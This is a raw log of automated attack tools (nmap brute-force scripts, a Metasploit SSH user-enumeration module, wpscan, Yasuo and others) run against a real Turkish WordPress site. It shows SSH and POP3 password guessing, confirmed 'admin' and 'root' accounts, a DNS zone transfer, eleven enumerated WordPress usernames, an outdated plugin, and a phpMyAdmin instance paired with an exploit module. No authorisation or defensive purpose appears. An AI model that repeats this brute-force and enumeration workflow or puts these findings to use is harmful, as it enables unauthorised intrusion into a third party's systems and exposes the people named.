- NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
- NSE: [ssh-brute] Trying username/password pair: user:fuckyou
- NSE: [ssh-brute] Trying username/password pair: web:fuckyou
- NSE: [ssh-brute] Trying username/password pair: test:fuckyou
- NSE: [ssh-brute] Trying username/password pair: root:123123
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- | gssapi-with-mic
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 371 guesses in 183 seconds, average tps: 1.9
- | ssh-hostkey:
- | 2048 ce:7f:c0:78:16:95:0d:2c:60:dc:82:68:17:6d:e6:81 (RSA)
- | 256 79:80:3d:14:38:da:dd:ec:7f:8f:b1:f4:20:58:42:bf (ECDSA)
- |_ 256 22:0e:2b:f3:6b:fe:b2:82:41:1b:c8:19:69:04:58:23 (ED25519)
- | ssh-publickey-acceptance:
- |_ Accepted Public Keys: No public keys accepted
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 3.10 (92%), Linux 3.5 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 (90%), Linux 3.11 (90%), Linux 3.2 (90%), Linux 3.4 - 3.10 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 164.44 ms 10.253.200.1
- 2 166.10 ms 213.184.122.97
- 3 164.60 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
- 4 164.87 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
- 5 217.45 ms bzq-219-189-50.dsl.bezeqint.net (62.219.189.50)
- 6 218.00 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
- 7 218.21 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
- 8 216.69 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
- 9 226.89 ms ip4.gtt.net (213.254.196.10)
- 10 218.32 ms ip4.gtt.net (213.254.196.10)
- 11 263.95 ms 134.222.104.205
- 12 265.53 ms 93-89-20-20.static.internetadresi.com (93.89.20.20)
- #######################################################################################################################################
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => tevhididavet.com
- RHOST => tevhididavet.com
- [*] 93.89.20.20:22 - SSH - Using malformed packet technique
- [*] 93.89.20.20:22 - SSH - Starting scan
- [+] 93.89.20.20:22 - SSH - User 'admin' found
- [-] 93.89.20.20:22 - SSH - User 'administrator' not found
- [-] 93.89.20.20:22 - SSH - User 'anonymous' not found
- [-] 93.89.20.20:22 - SSH - User 'backup' not found
- [-] 93.89.20.20:22 - SSH - User 'bee' not found
- [-] 93.89.20.20:22 - SSH - User 'ftp' not found
- [-] 93.89.20.20:22 - SSH - User 'guest' not found
- [-] 93.89.20.20:22 - SSH - User 'GUEST' not found
- [-] 93.89.20.20:22 - SSH - User 'info' not found
- [-] 93.89.20.20:22 - SSH - User 'mail' not found
- [-] 93.89.20.20:22 - SSH - User 'mailadmin' not found
- [-] 93.89.20.20:22 - SSH - User 'msfadmin' not found
- [-] 93.89.20.20:22 - SSH - User 'mysql' not found
- [-] 93.89.20.20:22 - SSH - User 'nobody' not found
- [-] 93.89.20.20:22 - SSH - User 'oracle' not found
- [-] 93.89.20.20:22 - SSH - User 'owaspbwa' not found
- [-] 93.89.20.20:22 - SSH - User 'postfix' not found
- [-] 93.89.20.20:22 - SSH - User 'postgres' not found
- [-] 93.89.20.20:22 - SSH - User 'private' not found
- [-] 93.89.20.20:22 - SSH - User 'proftpd' not found
- [-] 93.89.20.20:22 - SSH - User 'public' not found
- [+] 93.89.20.20:22 - SSH - User 'root' found
- [-] 93.89.20.20:22 - SSH - User 'superadmin' not found
- [-] 93.89.20.20:22 - SSH - User 'support' not found
- [-] 93.89.20.20:22 - SSH - User 'sys' not found
- [-] 93.89.20.20:22 - SSH - User 'system' not found
- [-] 93.89.20.20:22 - SSH - User 'systemadmin' not found
- [-] 93.89.20.20:22 - SSH - User 'systemadministrator' not found
- [-] 93.89.20.20:22 - SSH - User 'test' not found
- [-] 93.89.20.20:22 - SSH - User 'tomcat' not found
- [-] 93.89.20.20:22 - SSH - User 'user' not found
- [-] 93.89.20.20:22 - SSH - User 'webmaster' not found
- [-] 93.89.20.20:22 - SSH - User 'www-data' not found
- [-] 93.89.20.20:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 20:34 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE VERSION
- 53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7_5.1
- | dns-zone-transfer:
- | tevhididavet.com. SOA ns1.medyabim.com. hostmaster.tevhididavet.com.
- | tevhididavet.com. MX 10 mail.tevhididavet.com.
- | tevhididavet.com. TXT "v=spf1 a mx ip4:93.89.20.20 ~all"
- | tevhididavet.com. A 93.89.20.20
- | tevhididavet.com. NS ns1.medyabim.com.
- | tevhididavet.com. NS ns2.medyabim.com.
- | ftp.tevhididavet.com. A 93.89.20.20
- | mail.tevhididavet.com. A 93.89.20.20
- | pop.tevhididavet.com. A 93.89.20.20
- | smtp.tevhididavet.com. A 93.89.20.20
- | www.tevhididavet.com. A 93.89.20.20
- |_tevhididavet.com. SOA ns1.medyabim.com. hostmaster.tevhididavet.com.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.5 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 11 hops
- Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- Host script results:
- | dns-brute:
- | DNS Brute-force hostnames:
- | mail.tevhididavet.com - 93.89.20.20
- | ftp.tevhididavet.com - 93.89.20.20
- | smtp.tevhididavet.com - 93.89.20.20
- |_ www.tevhididavet.com - 93.89.20.20
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 167.82 ms 10.253.200.1
- 2 168.97 ms 213.184.122.97
- 3 167.91 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
- 4 168.22 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
- 5 219.25 ms bzq-179-124-190.cust.bezeqint.net (212.179.124.190)
- 6 215.49 ms bzq-179-124-34.cust.bezeqint.net (212.179.124.34)
- 7 221.62 ms et-0-0-37.cr10-fra2.ip4.gtt.net (89.149.180.49)
- 8 217.65 ms et-0-0-37.cr10-fra2.ip4.gtt.net (89.149.180.49)
- 9 233.72 ms ffm-s1-rou-1101.DE.eurorings.net (134.222.48.160)
- 10 233.73 ms ffm-s1-rou-1101.DE.eurorings.net (134.222.48.160)
- 11 264.57 ms 93-89-20-20.static.internetadresi.com (93.89.20.20)
- #######################################################################################################################################
- http://tevhididavet.com [200 OK] All-in-one-SEO-Pack[2.12.1], Apache[2], Country[TURKEY][TR], Google-Analytics[Universal][UA-62835212-1], HTML5, HTTPServer[Apache/2], IP[93.89.20.20], JQuery[1.11.1], MetaGenerator[WordPress 5.2.2], Open-Graph-Protocol[website], Script[application/ld+json,text/javascript], Title[Tevhidi Davet | Tevhide Davet Eder], UncommonHeaders[upgrade,link], WordPress[5.2.2], X-UA-Compatible[IE=edge]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://tevhididavet.com...
- ______________________________ SITE INFO _______________________________
- IP Title
- 93.89.20.20 Tevhidi Davet | Tevhide Davet Eder
- _______________________________ VERSION ________________________________
- Name Versions Type
- Roundcube CMS
- WordPress 5.2.2 CMS
- Apache 2 Platform
- _____________________________ INTERESTING ______________________________
- URL Note Type
- /robots.txt robots.txt index Interesting
- /readme.html Readme file Interesting
- /login/ Login Page Interesting
- ________________________________ TOOLS _________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- ________________________________________________________________________
- Time: 1.5 sec Urls: 443 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Sun, 23 Jun 2019 00:36:25 GMT
- Server: Apache/2
- Upgrade: h2,h2c
- Connection: Upgrade
- Link: <http://tevhididavet.com/wp-json/>; rel="https://api.w.org/"
- Vary: User-Agent
- Content-Type: text/html; charset=UTF-8
- HTTP/1.1 200 OK
- Date: Sun, 23 Jun 2019 00:36:26 GMT
- Server: Apache/2
- Upgrade: h2,h2c
- Connection: Upgrade
- Link: <http://tevhididavet.com/wp-json/>; rel="https://api.w.org/"
- Vary: User-Agent
- Content-Type: text/html; charset=UTF-8
- #######################################################################################################################################
- Google Font API
- Apache 2
- jQuery 1.11.1
- jQuery Migrate
- OWL Carousel
- Lazy.js
- WordPress
- React
- WordPress 5.2.2
- Upgrade: h2,h2c
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 20:36 EDT
- Nmap scan report for tevhididavet.com (93.89.20.20)
- Host is up (0.27s latency).
- rDNS record for 93.89.20.20: 93-89-20-20.static.internetadresi.com
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot DirectAdmin pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 212 guesses in 184 seconds, average tps: 1.1
- |_pop3-capabilities: USER PIPELINING TOP CAPA STLS SASL(PLAIN) RESP-CODES AUTH-RESP-CODE UIDL
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 3.5 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 169.23 ms 10.253.200.1
- 2 170.35 ms 213.184.122.97
- 3 164.49 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
- 4 169.57 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
- 5 219.36 ms bzq-219-189-86.cablep.bezeqint.net (62.219.189.86)
- 6 220.92 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
- 7 228.60 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
- 8 223.20 ms ip4.gtt.net (213.254.196.10)
- 9 219.74 ms ip4.gtt.net (213.254.196.10)
- 10 231.65 ms ip4.gtt.net (213.254.196.10)
- 11 265.14 ms 134.222.104.205
- 12 267.93 ms 93-89-20-20.static.internetadresi.com (93.89.20.20)
- #######################################################################################################################################
- Version: 1.11.13-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 93.89.20.20
- Testing SSL server tevhididavet.com on port 443 using SNI name tevhididavet.com
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha1WithRSAEncryption
- RSA Key Strength: 2048
- Subject: localhost
- Issuer: localhost
- Not valid before: Jun 15 12:50:24 2017 GMT
- Not valid after: Oct 30 12:50:24 2044 GMT
- #######################################################################################################################################
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +------------+-------------------------------------+--------------------------------------------------+-----------+-----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +------------+-------------------------------------+--------------------------------------------------+-----------+-----------+
- | phpMyAdmin | https://93.89.20.20:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
- +------------+-------------------------------------+--------------------------------------------------+-----------+-----------+
- #######################################################################################################################################
- [+] URL: http://tevhididavet.com/
- [+] Started: Sat Jun 22 19:14:47 2019
- Interesting Finding(s):
- [+] http://tevhididavet.com/
- | Interesting Entries:
- | - Server: Apache/2
- | - Upgrade: h2,h2c
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/robots.txt
- | Interesting Entries:
- | - /wp-admin/
- | - /wp-admin/admin-ajax.php
- | Found By: Robots Txt (Aggressive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/readme.html
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/wp-cron.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 60%
- | References:
- | - https://www.iplocation.net/defend-wordpress-from-ddos
- | - https://github.com/wpscanteam/wpscan/issues/1299
- [+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
- | Detected By: Rss Generator (Passive Detection)
- | - http://tevhididavet.com/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- | - http://tevhididavet.com/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- [+] WordPress theme in use: spixer
- | Location: http://tevhididavet.com/wp-content/themes/spixer/
- | Style URL: http://tevhididavet.com/wp-content/themes/spixer/style.css?ver=5.2.2
- | Style Name: Spixer
- | Style URI: https://www.kanthemes.com/landing/spixer
- | Description: Premium Wordpress Multipurpose Theme for Food, Magazine, Blog, Finance, Crypto Currency Fashion and ...
- | Author: Kan Themes
- | Author URI: https://www.kanthemes.com
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 1.4.4 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://tevhididavet.com/wp-content/themes/spixer/style.css?ver=5.2.2, Match: 'Version: 1.4.4'
- [+] Enumerating All Plugins (via Passive Methods)
- [+] Checking Plugin Versions (via Passive and Aggressive Methods)
- [i] Plugin(s) Identified:
- [+] all-in-one-seo-pack
- | Location: http://tevhididavet.com/wp-content/plugins/all-in-one-seo-pack/
- | Last Updated: 2019-06-15T15:57:00.000Z
- | [!] The version is out of date, the latest version is 3.1.1
- |
- | Detected By: Comment (Passive Detection)
- |
- | Version: 2.12.1 (100% confidence)
- | Detected By: Comment (Passive Detection)
- | - http://tevhididavet.com/, Match: 'All in One SEO Pack 2.12.1 by'
- | Confirmed By: Readme - Stable Tag (Aggressive Detection)
- | - http://tevhididavet.com/wp-content/plugins/all-in-one-seo-pack/readme.txt
- [+] Enumerating Config Backups (via Passive and Aggressive Methods)
- Checking Config Backups - Time: 00:00:04 <=============> (21 / 21) 100.00% Time: 00:00:04
- [i] No Config Backups Found.
- [+] Finished: Sat Jun 22 19:15:32 2019
- [+] Requests Done: 41
- [+] Cached Requests: 21
- [+] Data Sent: 8.409 KB
- [+] Data Received: 370.633 KB
- [+] Memory used: 189.34 MB
- [+] Elapsed time: 00:00:45
- #######################################################################################################################################
- [+] URL: http://tevhididavet.com/
- [+] Started: Sat Jun 22 19:14:39 2019
- Interesting Finding(s):
- [+] http://tevhididavet.com/
- | Interesting Entries:
- | - Server: Apache/2
- | - Upgrade: h2,h2c
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/robots.txt
- | Interesting Entries:
- | - /wp-admin/
- | - /wp-admin/admin-ajax.php
- | Found By: Robots Txt (Aggressive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/readme.html
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/wp-cron.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 60%
- | References:
- | - https://www.iplocation.net/defend-wordpress-from-ddos
- | - https://github.com/wpscanteam/wpscan/issues/1299
- [+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
- | Detected By: Rss Generator (Passive Detection)
- | - http://tevhididavet.com/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- | - http://tevhididavet.com/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- [+] WordPress theme in use: spixer
- | Location: http://tevhididavet.com/wp-content/themes/spixer/
- | Style URL: http://tevhididavet.com/wp-content/themes/spixer/style.css?ver=5.2.2
- | Style Name: Spixer
- | Style URI: https://www.kanthemes.com/landing/spixer
- | Description: Premium Wordpress Multipurpose Theme for Food, Magazine, Blog, Finance, Crypto Currency Fashion and ...
- | Author: Kan Themes
- | Author URI: https://www.kanthemes.com
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 1.4.4 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://tevhididavet.com/wp-content/themes/spixer/style.css?ver=5.2.2, Match: 'Version: 1.4.4'
- [+] Enumerating Users (via Passive and Aggressive Methods)
- Brute Forcing Author IDs - Time: 00:00:23 <==> (10 / 10) 100.00% Time: 00:00:23
- [i] User(s) Identified:
- [+] abdullahsaid
- | Detected By: Author Posts - Author Pattern (Passive Detection)
- | Confirmed By:
- | Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] esedullahsaid
- | Detected By: Author Posts - Author Pattern (Passive Detection)
- | Confirmed By:
- | Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] abdullahelesrefi
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] abdurrezzak
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] ademelesrefi
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] hasansalih
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] mfurkansaid
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- [+] muhammedsahan
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- [+] mustafabsezgin
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] osmanettalib
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] tevhididavet
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] Finished: Sat Jun 22 19:15:58 2019
- [+] Requests Done: 70
- [+] Cached Requests: 7
- [+] Data Sent: 16.196 KB
- [+] Data Received: 1.482 MB
- [+] Memory used: 97.672 MB
- [+] Elapsed time: 00:01:19
- #######################################################################################################################################
- [+] URL: http://tevhididavet.com/
- [+] Started: Sat Jun 22 19:17:32 2019
- Interesting Finding(s):
- [+] http://tevhididavet.com/
- | Interesting Entries:
- | - Server: Apache/2
- | - Upgrade: h2,h2c
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/robots.txt
- | Interesting Entries:
- | - /wp-admin/
- | - /wp-admin/admin-ajax.php
- | Found By: Robots Txt (Aggressive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/readme.html
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- [+] http://tevhididavet.com/wp-cron.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 60%
- | References:
- | - https://www.iplocation.net/defend-wordpress-from-ddos
- | - https://github.com/wpscanteam/wpscan/issues/1299
- [+] WordPress version 5.2.2 identified (Latest, released on 2019-06-18).
- | Detected By: Rss Generator (Passive Detection)
- | - http://tevhididavet.com/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- | - http://tevhididavet.com/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
- [+] WordPress theme in use: spixer
- | Location: http://tevhididavet.com/wp-content/themes/spixer/
- | Style URL: http://tevhididavet.com/wp-content/themes/spixer/style.css?ver=5.2.2
- | Style Name: Spixer
- | Style URI: https://www.kanthemes.com/landing/spixer
- | Description: Premium Wordpress Multipurpose Theme for Food, Magazine, Blog, Finance, Crypto Currency Fashion and ...
- | Author: Kan Themes
- | Author URI: https://www.kanthemes.com
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 1.4.4 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://tevhididavet.com/wp-content/themes/spixer/style.css?ver=5.2.2, Match: 'Version: 1.4.4'
- [+] Enumerating Users (via Passive and Aggressive Methods)
- Brute Forcing Author IDs - Time: 00:00:03 <============> (10 / 10) 100.00% Time: 00:00:03
- [i] User(s) Identified:
- [+] abdullahsaid
- | Detected By: Author Posts - Author Pattern (Passive Detection)
- | Confirmed By:
- | Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] esedullahsaid
- | Detected By: Author Posts - Author Pattern (Passive Detection)
- | Confirmed By:
- | Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] abdullahelesrefi
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] abdurrezzak
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] ademelesrefi
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] hasansalih
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] mfurkansaid
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- [+] muhammedsahan
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- [+] mustafabsezgin
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] osmanettalib
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] tevhididavet
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://tevhididavet.com/wp-json/wp/v2/users/?per_page=100&page=1
- | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- [+] Finished: Sat Jun 22 19:18:02 2019
- [+] Requests Done: 24
- [+] Cached Requests: 53
- [+] Data Sent: 5.703 KB
- [+] Data Received: 110.915 KB
- [+] Memory used: 88.996 MB
- [+] Elapsed time: 00:00:30
- #######################################################################################################################################
- [INFO] Date: 22/06/19 | Time: 19:19:21
- [INFO] ------TARGET info------
- [*] TARGET: http://tevhididavet.com/
- [*] TARGET IP: 93.89.20.20
- [INFO] NO load balancer detected for tevhididavet.com...
- [*] DNS servers: ns1.medyabim.com.
- [*] TARGET server: Apache/2
- [*] CC: TR
- [*] Country: Turkey
- [*] RegionCode: 16
- [*] RegionName: Bursa
- [*] City: Bursa
- [*] ASN: AS44922
- [*] BGP_PREFIX: 93.89.20.0/24
- [*] ISP: MEDYABIM-AS MEDYABIM INTERNET HIZMETLERI, TR
